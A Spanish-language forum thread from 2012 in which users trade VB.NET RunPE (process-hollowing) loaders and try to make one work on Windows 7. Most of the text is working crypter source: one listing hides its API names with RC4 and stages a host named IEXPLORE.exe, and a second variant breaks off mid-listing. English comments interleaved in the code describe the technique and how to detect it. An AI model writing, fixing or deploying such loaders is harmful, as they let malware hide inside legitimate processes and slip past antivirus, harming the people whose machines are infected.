Ayuda RunPe win7

Iniciado por Cromatico, 3 Noviembre 2012, 15:24 PM


Cromatico

¡Buenos días! (Al menos acá en Argentina :P)
Quería hacer una consulta: estuve buscando varios RunPE programados en VB.NET, los cuales me han funcionado perfecto en Windows XP con Framework 4.0 instalado...

Ahora ninguno, de los aproximadamente 6 runpe que encontre, me funciona en windows seven....

Compilado el ejecutable bajo mi maquina win7 con visual studio 2010, lo ejecuto y me dice:
Error CLR: 80004005.
El programa terminará ahora.


Ahora copio el ejecutable en mi maquina con windows xp + framework 4.0 y se ejecuta correctamente inyectado a un proceso en blanco programado en .net tambien... El problema es que con windows 7 no logro hacer funcionar nada!!
Y obviamente tengo instalado el framework por que me lo instala el visual studio...

Alguna idea??

Gracias gente!

_katze_

sin codigo no te puedo ayudar! si lo subis mas el compilado asi lo pruebo y te lo corrijo

Cromatico

Te dejo el codigo con uno de los runpe que funciona en xp y no en 7:

MAIN:

        ' Loader entry code from the post: reads a local executable into a byte array and passes it
        ' to RunPE.Iniciar together with the path of a second executable used as the host process.
        ' Analyst notes (grounded in the lines below):
        '  - The host file is named IEXPLORE.exe but lives in the application's own folder; a
        '    browser-like image name running from a non-standard path is a masquerading signal
        '    worth alerting on.
        '  - The "Inyectado correctamente" message box is shown before RunPE.Iniciar is called and
        '    the Boolean that Iniciar returns is discarded, so the message says nothing about the
        '    outcome.
        Dim X() As Byte
        ' Stage copies next to the executable: Inject.exe -> Temp.exe, Inject.dll -> IEXPLORE.exe.
        FileCopy(Application.StartupPath & "\Inject.exe", Application.StartupPath & "\Temp.exe")
        FileCopy(Application.StartupPath & "\Inject.dll", Application.StartupPath & "\IEXPLORE.exe")
        ' Read the whole of Temp.exe into X (legacy VB file I/O on file number 1).
        FileOpen(1, Application.StartupPath & "\Temp.exe", OpenMode.Binary)
        ReDim X(0 To LOF(1) - 1)
        FileGet(1, X)
        FileClose(1)
        Call MsgBox("Inyectado correctamente", vbSystemModal, "ASDl")
        ' X is the image to load; IEXPLORE.exe is the process it is loaded into.
        RunPE.Iniciar(X, Application.StartupPath & "\IEXPLORE.exe")
        ' The temporary copy is deleted afterwards; the IEXPLORE.exe copy is left on disk.
        Kill(Application.StartupPath & "\Temp.exe")
        End


Aclaración: IEXPLORE.EXE es un proyecto de VB.NET en blanco, con un solo formulario, porque tengo entendido que VB.NET puede inyectarse solo en VB.NET; entonces creé un proyecto en blanco en el cual trato de inyectar el código. En XP funciona, en Seven no...

Y el runpe:

Imports System.Runtime.InteropServices
Imports System.Text

' RunPE ("process hollowing", MITRE ATT&CK T1055.012) loader as posted in the thread.
' Analyst summary, grounded in the code below:
'  - Win32 APIs are resolved at run time (makeapi.makemake); the only declared imports are
'    LoadLibraryExA and GetProcAddress, and several API/library names are stored as
'    RC4-obfuscated string literals rather than plain text.
'  - Iniciar starts a host process suspended, unmaps its image, writes the supplied PE into it,
'    redirects the primary thread's context and resumes the thread.
' Because the API names are hidden from static inspection, behavioural telemetry (suspended
' process creation followed by remote unmap / allocate / write and SetThreadContext from the
' same parent) is a more reliable detection basis than import or string matching.
Public Class RunPE
    ' Helper class: string de-obfuscation plus run-time API resolution.
    Public Class makeapi
        ' Flag values for the third parameter of LoadLibraryExA (declared below).
        Enum flagginglib As UInteger
            DONT_RESOLVE_DLL_REFERENCES = &H1
            LOAD_IGNORE_CODE_AUTHZ_LEVEL = &H10
            LOAD_LIBRARY_AS_DATAFILE = &H2
            LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE = &H40
            LOAD_LIBRARY_AS_IMAGE_RESOURCE = &H20
            LOAD_WITH_ALTERED_SEARCH_PATH = &H8
        End Enum
        ' RC4-style transform over the characters of a string (key scheduling over a 0..255
        ' state array, then a keystream XORed with each input character).
        '   first parameter  - text to transform, one Asc() value per character.
        '   second parameter - key text; its characters are repeated to fill 256 key slots.
        ' Returns the transformed text built with Chr(). The identifiers are machine-generated
        ' (obfuscator output), which is itself a triage indicator.
        ' NOTE(review): Asc/Chr work in the system ANSI code page, so an offline decoder written
        ' for analysis presumably has to use the same code page - confirm against the sample.
        Shared Function rc4(ByVal tgIdqYlTptZIYySGkIfl As String, ByVal hsvKghrWvMoOcupfKZXA As String) As String
            Dim NAkhTayqmyFeznwXFsub As Integer = 0
            Dim SlGZgrJMHyawvBYVPHmH As Integer = hsvKghrWvMoOcupfKZXA.Length
            ' New Integer(256) {} has upper bound 256, i.e. 257 elements; only 0..255 are used.
            Dim HVBCaKTKpREAVNDpYwhF As Integer() = New Integer(256) {}
            Dim LunuMzlEYOzMEgSJWCJR As New StringBuilder
            Dim ZfwwZXdWiJbOGhpfKUIY As Integer = 0
            Dim OazalfxhTnyTWJdrzWLi As Integer = 0
            Dim AKucfzcguranHHowPlYk As Integer = 0
            Dim DaLPwiLgsIoUrvVLOEXS As String = String.Empty
            Dim ggIDcYNTbtUtqkRWBISB As Integer = 0
            Dim nPinkvyGjktTycrKexsh As Integer() = New Integer(256) {}
            ' Initialise the state array to 0..255 and expand the key into a parallel array.
            While NAkhTayqmyFeznwXFsub <= 255
                Dim uWPxdmnlqGXcUZAimogU As Char = (hsvKghrWvMoOcupfKZXA.Substring((NAkhTayqmyFeznwXFsub Mod SlGZgrJMHyawvBYVPHmH), 1).ToCharArray()(0))
                nPinkvyGjktTycrKexsh(NAkhTayqmyFeznwXFsub) = NAkhTayqmyFeznwXFsub
                HVBCaKTKpREAVNDpYwhF(NAkhTayqmyFeznwXFsub) = Microsoft.VisualBasic.Strings.Asc(uWPxdmnlqGXcUZAimogU)
                ' Net effect is "counter += 1"; the Math.Max result is discarded.
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            ' Key-scheduling pass: swap state entries driven by the expanded key.
            While OazalfxhTnyTWJdrzWLi <= 255
                AKucfzcguranHHowPlYk = (AKucfzcguranHHowPlYk + nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) + HVBCaKTKpREAVNDpYwhF(OazalfxhTnyTWJdrzWLi)) Mod 256
                Dim cUOouGVJrmnlqbipUhgw As Integer = nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi)
                nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) = nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk)
                nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk) = cUOouGVJrmnlqbipUhgw
                System.Math.Max(System.Threading.Interlocked.Increment(OazalfxhTnyTWJdrzWLi), OazalfxhTnyTWJdrzWLi - 1)
            End While
            ' Keystream pass: one keystream value per input character, XORed with its Asc() code.
            NAkhTayqmyFeznwXFsub = 1
            While NAkhTayqmyFeznwXFsub <= tgIdqYlTptZIYySGkIfl.Length
                Dim VxiyRYwVydGLxZPzGNII As Integer = 0
                ggIDcYNTbtUtqkRWBISB = (ggIDcYNTbtUtqkRWBISB + 1) Mod 256
                ZfwwZXdWiJbOGhpfKUIY = (ZfwwZXdWiJbOGhpfKUIY + nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)) Mod 256
                VxiyRYwVydGLxZPzGNII = nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)
                nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) = nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)
                nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY) = VxiyRYwVydGLxZPzGNII
                Dim mogUiHKshEsjxOqpddYH As Integer = nPinkvyGjktTycrKexsh((nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) + nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)) Mod 256)
                Dim MECWMqRqoiWxXTFCSctu As Char = tgIdqYlTptZIYySGkIfl.Substring(NAkhTayqmyFeznwXFsub - 1, 1).ToCharArray()(0)
                VxiyRYwVydGLxZPzGNII = Asc(MECWMqRqoiWxXTFCSctu)
                Dim DSbyfPNYKemcORTEIrls As Integer = VxiyRYwVydGLxZPzGNII Xor mogUiHKshEsjxOqpddYH
                LunuMzlEYOzMEgSJWCJR.Append(Chr(DSbyfPNYKemcORTEIrls))
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            DaLPwiLgsIoUrvVLOEXS = LunuMzlEYOzMEgSJWCJR.ToString
            LunuMzlEYOzMEgSJWCJR.Length = 0
            Return DaLPwiLgsIoUrvVLOEXS
        End Function
        ' The only two Win32 imports this class declares; every other API is reached through them.
        Declare Function LoadLibraryExA Lib "kernel32" (ByVal uno As String, ByVal due As IntPtr, ByVal cinque As flagginglib) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal tre As IntPtr, ByVal quattro As String) As IntPtr
        ' Resolves export pfunc of library plib at run time and wraps the address in a delegate
        ' of type obj (LoadLibraryExA with LOAD_LIBRARY_AS_DATAFILE -> GetProcAddress ->
        ' Marshal.GetDelegateForFunctionPointer). Neither intermediate result is checked here.
        ' Static-analysis consequence: the APIs called through these delegates are absent from
        ' the assembly's declared imports.
        Shared Function makemake(Of obj)(ByVal plib As String, ByVal pfunc As String) As obj
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryExA(plib, CType(0, IntPtr), flagginglib.LOAD_LIBRARY_AS_DATAFILE), pfunc), GetType(obj)), Object), obj)
        End Function
    End Class

    ' Delegate signatures for the APIs resolved through makeapi.makemake. Most use shortened
    ' names; which export each one is bound to is decided at the makemake call sites in Iniciar.
    ' The CreateProcess delegate takes the startup and process information as raw arrays
    ' (Byte() and IntPtr()) instead of marshalled structures.
    Delegate Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function getthrcontx(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function nunmpsctn(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
    Delegate Function rdprocssmr(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function resmthrd(ByVal hThread As IntPtr) As UInteger
    Delegate Function strthd(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function vrtall(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr

    ' Starts pProcess0Injectto suspended and replaces its image with the PE in pByteArray.
    '   pByteArray        - raw bytes of the PE file to load; header fields are read from it at
    '                       fixed offsets relative to the value stored at offset 60.
    '   pProcess0Injectto - command line handed to the process-creation call (the host process).
    ' Returns False only when an exception is thrown (bare Catch). Every other path, including a
    ' failed process creation or a failed inner check, falls through to Return True.
    ' Call sequence visible below, in order, which is the behavioural chain to detect:
    '   process creation with flag 4 (CREATE_SUSPENDED) -> thread-context read -> 4-byte remote
    '   read at (context slot &H29 + 8) -> NtUnmapViewOfSection -> VirtualAllocEx(&H3000, &H40)
    '   -> remote writes (headers, then each section) -> 4-byte remote write back to the same
    '   address -> SetThreadContext with slot &H2C changed -> ResumeThread.
    Public Shared Function Iniciar(ByVal pByteArray As Byte(), ByVal pProcess0Injectto As String) As Boolean
        Try
            ' Offset 60 (&H3C) of a PE file holds e_lfanew, the offset of the NT headers.
            Dim num2 As Integer = BitConverter.ToInt32(pByteArray, 60)
            Dim resm As resmthrd = makeapi.makemake(Of resmthrd)("kernel32", "ResumeThread")
            ' Raw buffers for the process-creation call: 4 pointer-sized slots and 68 bytes.
            ' Slots 0 and 1 are used below as the process handle and the thread handle.
            Dim processInfo As IntPtr() = New IntPtr(3) {}
            Dim startupInfo As Byte() = New Byte(67) {}
            ' API name is an RC4-obfuscated literal; the delegate type suggests a CreateProcess
            ' export - decoded value not verified here.
            Dim crt As CreateProcess = makeapi.makemake(Of CreateProcess)("kernel32", makeapi.rc4("MŒuÖÈvÒö˜þe(,,", "junkst"))
            ' NT headers + 6: NumberOfSections; + &H54: SizeOfHeaders (PE32 layout).
            Dim num As Integer = BitConverter.ToInt16(pByteArray, num2 + 6)
            Dim ptr4 As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H54))
            ' Both the library name and the API name are obfuscated here; the delegate type
            ' suggests GetThreadContext - decoded values not verified here.
            Dim gettr As getthrcontx = makeapi.makemake(Of getthrcontx)(makeapi.rc4("p¨°Þ2dí", "pass1"), makeapi.rc4("\¨¶ä?2¾ÑÆ-f1©", "pass1"))
            Dim procAttr As IntPtr = IntPtr.Zero


            ' Creation flag 4 is CREATE_SUSPENDED: the host process exists but has not run yet.
            If crt(Nothing, New StringBuilder(pProcess0Injectto), procAttr, procAttr, False, 4, _
            procAttr, Nothing, startupInfo, processInfo) Then
                ' Thread context as a raw UInteger array; element 0 is the flags field
                ' (&H10002 = x86 base flag Or integer registers).
                Dim ctxt As UInteger() = New UInteger(178) {}
                ctxt(0) = &H10002
                If gettr(processInfo(1), ctxt) Then
                    ' Slot &H29 is byte offset 164 of the context (Ebx in the x86 layout); the
                    ' code reads the host's image base pointer from that address + 8.
                    Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                    Dim buffer__1 As IntPtr = IntPtr.Zero
                    Dim bufferSize As New IntPtr(4)

                    Dim numRead As IntPtr = IntPtr.Zero
                    Dim nunmap As nunmpsctn = makeapi.makemake(Of nunmpsctn)("ntdll", "NtUnmapViewOfSection")
                    ' Obfuscated API name; the delegate type suggests ReadProcessMemory -
                    ' decoded value not verified here.
                    Dim readprcsmmry As rdprocssmr = makeapi.makemake(Of rdprocssmr)("kernel32", makeapi.rc4("¥Õ lÕß'Ò7ìâè·ÞîÕ", "pass"))

                    ' Read the host's current image base, then unmap that image from the host.
                    ' Unmapping the main image of a freshly created child is rare in benign
                    ' software and is the core signal for this technique.
                    If readprcsmmry(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (nunmap(processInfo(0), buffer__1) = 0) Then
                        ' NT headers + &H34: ImageBase; + 80: SizeOfImage (PE32 layout).
                        Dim addr As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H34))
                        Dim size As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + 80))
                        Dim vrtal As vrtall = makeapi.makemake(Of vrtall)("kernel32", "VirtualAllocEx")
                        ' &H3000 = MEM_COMMIT Or MEM_RESERVE; &H40 = PAGE_EXECUTE_READWRITE.
                        ' The whole image is allocated read-write-execute in the remote process.
                        Dim lpBaseAddress As IntPtr = vrtal(processInfo(0), addr, size, &H3000, &H40)

                        Dim lpNumberOfBytesWritten As Integer
                        ' Obfuscated API name; the delegate type (wrtproc) suggests
                        ' WriteProcessMemory - decoded value not verified here.
                        Dim wrt As wrtproc = makeapi.makemake(Of wrtproc)("kernel32", makeapi.rc4("aúþìÍ;zä®º2mó¹ý", "junks"))

                        ' First remote write: the PE headers (SizeOfHeaders bytes).
                        wrt(processInfo(0), lpBaseAddress, pByteArray, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                        Dim num5 As Integer = num - 1
                        ' One remote write per section. Section headers are 40 bytes each and
                        ' start at NT headers + &HF8; as Integer slots, dst(3) is VirtualAddress,
                        ' dst(4) is SizeOfRawData and dst(5) is PointerToRawData.
                        For i As Integer = 0 To num5
                            Dim dst As Integer() = New Integer(9) {}
                            Buffer.BlockCopy(pByteArray, (num2 + &HF8) + (i * 40), dst, 0, 40)
                            Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                            Buffer.BlockCopy(pByteArray, dst(5), buffer2, 0, buffer2.Length)

                            ' size and addr are reused as scratch: target address and byte count.
                            size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                            addr = New IntPtr(buffer2.Length)

                            wrt(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                        Next
                        ' Write the new image base back to the address it was read from.
                        size = New IntPtr(ctxt(&H29) + 8L)
                        addr = New IntPtr(4)

                        wrt(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                        ' Slot &H2C is byte offset 176 (Eax in the x86 layout); it is set to
                        ' new base + AddressOfEntryPoint (NT headers + 40).
                        ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(pByteArray, num2 + 40))

                        Dim sethre As strthd = makeapi.makemake(Of strthd)("kernel32", "SetThreadContext")

                        sethre(processInfo(1), ctxt)
                    End If
                End If

                ' The thread is resumed whether or not the inner steps succeeded.
                resm(processInfo(1))
            End If
        Catch
            ' Any exception is swallowed and reported only as False.
            Return False
        End Try
        Return True
    End Function
    ' Delegate used for the remote-write calls in Iniciar (bound there through makemake).
    Delegate Function wrtproc(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
End Class


Gracias katze por el interes!

Cromatico

Alguna idea o alguien sabe de alguno que funcione en win7?

Gracias!

_katze_

proba amigo con este sino deja que me programo uno de 0
Imports System.Runtime.InteropServices
Imports System.Text

' Second RunPE ("process hollowing", MITRE ATT&CK T1055.012) variant posted in the thread.
' Unlike the first listing, this one declares its Win32 APIs with DllImport and marshals real
' structures, so the API set is visible in the assembly's import metadata: CreateProcess,
' GetThreadContext / SetThreadContext, ReadProcessMemory / WriteProcessMemory,
' ZwUnmapViewOfSection, VirtualAllocEx / VirtualProtectEx and ResumeThread appearing together
' in one managed assembly is a strong static triage indicator. The entry point is SRexec.
Class DD
    ' Managed mirror of the Win32 STARTUPINFO structure passed to CreateProcess.
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
Structure STARTUPINFO
        Public cb As Integer
        Public lpReserved As String
        Public lpDesktop As String
        Public lpTitle As String
        Public dwX As Integer
        Public dwY As Integer
        Public dwXSize As Integer
        Public dwYSize As Integer
        Public dwXCountChars As Integer
        Public dwYCountChars As Integer
        Public dwFillAttribute As Integer
        Public dwFlags As Integer
        Public wShowWindow As Short
        Public cbReserved2 As Short
        Public lpReserved2 As Integer
        Public hStdInput As Integer
        Public hStdOutput As Integer
        Public hStdError As Integer
    End Structure
    ' Receives the handles and ids of the process and primary thread created by CreateProcess.
    Private Structure PROCESS_INFORMATION
        Public hProcess As IntPtr
        Public hThread As IntPtr
        Public dwProcessId As Integer
        Public dwThreadId As Integer
    End Structure
    ' DOS header at the start of a PE file; SRexec uses e_magic and e_lfanew.
    <StructLayout(LayoutKind.Sequential)> _
    Private Structure IMAGE_DOS_HEADER
        Public e_magic As UInt16
        ' Magic number
        Public e_cblp As UInt16
        ' Bytes on last page of file
        Public e_cp As UInt16
        ' Pages in file
        Public e_crlc As UInt16
        ' Relocations
        Public e_cparhdr As UInt16
        ' Size of header in paragraphs
        Public e_minalloc As UInt16
        ' Minimum extra paragraphs needed
        Public e_maxalloc As UInt16
        ' Maximum extra paragraphs needed
        Public e_ss As UInt16
        ' Initial (relative) SS value
        Public e_sp As UInt16
        ' Initial SP value
        Public e_csum As UInt16
        ' Checksum
        Public e_ip As UInt16
        ' Initial IP value
        Public e_cs As UInt16
        ' Initial (relative) CS value
        Public e_lfarlc As UInt16
        ' File address of relocation table
        Public e_ovno As UInt16
        ' Overlay number
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _
        Public e_res1 As UInt16()
        ' Reserved words
        Public e_oemid As UInt16
        ' OEM identifier (for e_oeminfo)
        Public e_oeminfo As UInt16
        ' OEM information; e_oemid specific
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _
        Public e_res2 As UInt16()
        ' Reserved words
        Public e_lfanew As Int32
        ' File address of new EXE header
    End Structure
    ' Version-resource header; not referenced by the code visible in this listing.
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
    Private Structure VS_VERSIONINFO
        Public wLength As UInt16
        Public wValueLength As UInt16
        Public wType As UInt16
        <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _
        Public szKey As String
        Public Padding1 As UInt16
    End Structure
    ' Security attributes passed (zero-initialised) to CreateProcess for process and thread.
    <StructLayout(LayoutKind.Sequential)> _
    Structure SECURITY_ATTRIBUTES
        Public nLength As Integer
        Public lpSecurityDescriptor As IntPtr
        Public bInheritHandle As Integer
    End Structure
    ' Fixed version-info block; not referenced by the code visible in this listing.
    <StructLayout(LayoutKind.Sequential)> _
    Private Structure VS_FIXEDFILEINFO
        Public dwSignature As UInt32
        Public dwStrucVersion As UInt32
        Public dwFileVersionMS As UInt32
        Public dwFileVersionLS As UInt32
        Public dwProductVersionMS As UInt32
        Public dwProductVersionLS As UInt32
        Public dwFileFlagsMask As UInt32
        Public dwFileFlags As UInt32
        Public dwFileOS As UInt32
        Public dwFileType As UInt32
        Public dwFileSubtype As UInt32
        Public dwFileDateMS As UInt32
        Public dwFileDateLS As UInt32
    End Structure
    ' Floating-point save area embedded in CONTEXT below.
    <StructLayout(LayoutKind.Sequential)> _
    Public Structure FLOATING_SAVE_AREA


        Public ControlWord As UInteger
        Public StatusWord As UInteger
        Public TagWord As UInteger
        Public ErrorOffset As UInteger
        Public ErrorSelector As UInteger
        Public DataOffset As UInteger
        Public DataSelector As UInteger
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _
        Public RegisterArea As Byte()
        Public Cr0NpxState As UInteger

    End Structure
    ' Thread context with x86 register fields (see the CONTEXT86_* constants further down).
    ' SRexec reads Ebx and overwrites Eax through this structure.
    <StructLayout(LayoutKind.Sequential)> _
    Public Structure CONTEXT


        Public ContextFlags As UInteger
        'set this to an appropriate value
        ' Retrieved by CONTEXT_DEBUG_REGISTERS
        Public Dr0 As UInteger
        Public Dr1 As UInteger
        Public Dr2 As UInteger
        Public Dr3 As UInteger
        Public Dr6 As UInteger
        Public Dr7 As UInteger
        ' Retrieved by CONTEXT_FLOATING_POINT
        Public FloatSave As FLOATING_SAVE_AREA
        ' Retrieved by CONTEXT_SEGMENTS
        Public SegGs As UInteger
        Public SegFs As UInteger
        Public SegEs As UInteger
        Public SegDs As UInteger
        ' Retrieved by CONTEXT_INTEGER
        Public Edi As UInteger
        Public Esi As UInteger
        Public Ebx As UInteger
        Public Edx As UInteger
        Public Ecx As UInteger
        Public Eax As UInteger
        ' Retrieved by CONTEXT_CONTROL
        Public Ebp As UInteger
        Public Eip As UInteger
        Public SegCs As UInteger
        Public EFlags As UInteger
        Public Esp As UInteger
        Public SegSs As UInteger
        ' Retrieved by CONTEXT_EXTENDED_REGISTERS
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _
        Public ExtendedRegisters As Byte()

    End Structure
    ' PE32 optional header. SRexec uses ImageBase, SizeOfImage, SizeOfHeaders and
    ' AddressOfEntryPoint from it.
    <StructLayout(LayoutKind.Sequential)> _
  Public Structure IMAGE_OPTIONAL_HEADER32
        '
        ' Standard fields.
        '
        Public Magic As UInt16
        Public MajorLinkerVersion As [Byte]
        Public MinorLinkerVersion As [Byte]
        Public SizeOfCode As UInt32
        Public SizeOfInitializedData As UInt32
        Public SizeOfUninitializedData As UInt32
        Public AddressOfEntryPoint As UInt32
        Public BaseOfCode As UInt32
        Public BaseOfData As UInt32
        '
        ' NT additional fields.
        '
        Public ImageBase As UInt32
        Public SectionAlignment As UInt32
        Public FileAlignment As UInt32
        Public MajorOperatingSystemVersion As UInt16
        Public MinorOperatingSystemVersion As UInt16
        Public MajorImageVersion As UInt16
        Public MinorImageVersion As UInt16
        Public MajorSubsystemVersion As UInt16
        Public MinorSubsystemVersion As UInt16
        Public Win32VersionValue As UInt32
        Public SizeOfImage As UInt32
        Public SizeOfHeaders As UInt32
        Public CheckSum As UInt32
        Public Subsystem As UInt16
        Public DllCharacteristics As UInt16
        Public SizeOfStackReserve As UInt32
        Public SizeOfStackCommit As UInt32
        Public SizeOfHeapReserve As UInt32
        Public SizeOfHeapCommit As UInt32
        Public LoaderFlags As UInt32
        Public NumberOfRvaAndSizes As UInt32
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _
        Public DataDirectory As IMAGE_DATA_DIRECTORY()
    End Structure
    ' COFF file header; SRexec uses NumberOfSections.
    <StructLayout(LayoutKind.Sequential)> _
Public Structure IMAGE_FILE_HEADER
        Public Machine As UInt16
        Public NumberOfSections As UInt16
        Public TimeDateStamp As UInt32
        Public PointerToSymbolTable As UInt32
        Public NumberOfSymbols As UInt32
        Public SizeOfOptionalHeader As UInt16
        Public Characteristics As UInt16
    End Structure
    ' One entry of the optional header's data-directory table.
    <StructLayout(LayoutKind.Sequential)> _
Public Structure IMAGE_DATA_DIRECTORY
        Public VirtualAddress As UInt32
        Public Size As UInt32
    End Structure
    ' NT headers: signature, file header, optional header. SRexec checks Signature.
    Public Structure IMAGE_NT_HEADERS
        Public Signature As UInt32
        Public FileHeader As IMAGE_FILE_HEADER
        Public OptionalHeader As IMAGE_OPTIONAL_HEADER32
    End Structure
    Public Enum IMAGE_SIZEOF_SHORT_NAME
        IMAGE_SIZEOF_SHORT_NAME = 8
    End Enum
    ' Union member of the section header as declared by this listing.
    Public Structure Misc
        Public PhysicalAddress As System.UInt32
        Public VirtualSize As System.UInt32
    End Structure
    ' Section header as declared by this listing. SRexec reads VirtualAddress, SizeOfRawData,
    ' PointerToRawData, Misc.VirtualSize and Characteristics through it.
    Public Structure IMAGE_SECTION_HEADER
        Public Name As System.Byte
        Public Misc As Misc
        Public VirtualAddress As System.UInt32
        Public SizeOfRawData As System.UInt32
        Public PointerToRawData As System.UInt32
        Public PointerToRelocations As System.UInt32
        Public PointerToLinenumbers As System.UInt32
        Public NumberOfRelocations As System.UInt16
        Public NumberOfLinenumbers As System.UInt16
        Public Characteristics As System.UInt32
    End Structure

    ' Thread-context flag values, process-creation flag, and memory allocation / protection
    ' constants used by the API calls below.
    Public Const CONTEXT_X86 = &H10000
    Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1)          'SS:SP, CS:IP, FLAGS, BP
    Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2)          'AX, BX, CX, DX, SI, DI
    Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4)         'DS, ES, FS, GS
    Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8)   '387 state
    Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
    Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)
    Public Const CREATE_SUSPENDED = &H4
    Public Const MEM_COMMIT As Long = &H1000&
    Public Const MEM_RESERVE As Long = &H2000&
    Public Const PAGE_NOCACHE As Long = &H200
    Public Const PAGE_EXECUTE_READWRITE As Long = &H40
    Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
    Public Const PAGE_EXECUTE_READ As Long = &H20
    Public Const PAGE_EXECUTE As Long = &H10
    Public Const PAGE_WRITECOPY As Long = &H8
    Public Const PAGE_NOACCESS As Long = &H1
    Public Const PAGE_READWRITE As Long = &H4

    ' Declared Win32 imports. Taken together they are the import-level fingerprint of this
    ' listing: thread-context get/set, remote memory read/write/allocate/protect, section
    ' unmapping and thread resume.
    <DllImport("kernel32.dll")> _
    Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
    End Function

    ' Declared but not called by the code visible in this listing.
    <DllImport("kernel32.dll")> _
    Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function CreateProcess(ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _
     ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _
    ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _
   <[In]()> ByRef lpStartupInfo As STARTUPINFO, _
   <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean
    End Function

    ' Two bindings of the same export (EntryPoint "WriteProcessMemory"): one taking a managed
    ' byte array, one taking a raw pointer.
    <DllImport("kernel32.dll", _
    SetLastError:=True, _
    CharSet:=CharSet.Auto, _
    EntryPoint:="WriteProcessMemory", _
    CallingConvention:=CallingConvention.StdCall)> _
Shared Function WriteProcessMemory( _
ByVal hProcess As IntPtr, _
ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As Byte(), _
ByVal iSize As Int32, _
<Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
    End Function
    <DllImport("kernel32.dll", _
SetLastError:=True, _
CharSet:=CharSet.Auto, _
EntryPoint:="WriteProcessMemory", _
CallingConvention:=CallingConvention.StdCall)> _
Shared Function WriteProcessMemoryI( _
ByVal hProcess As IntPtr, _
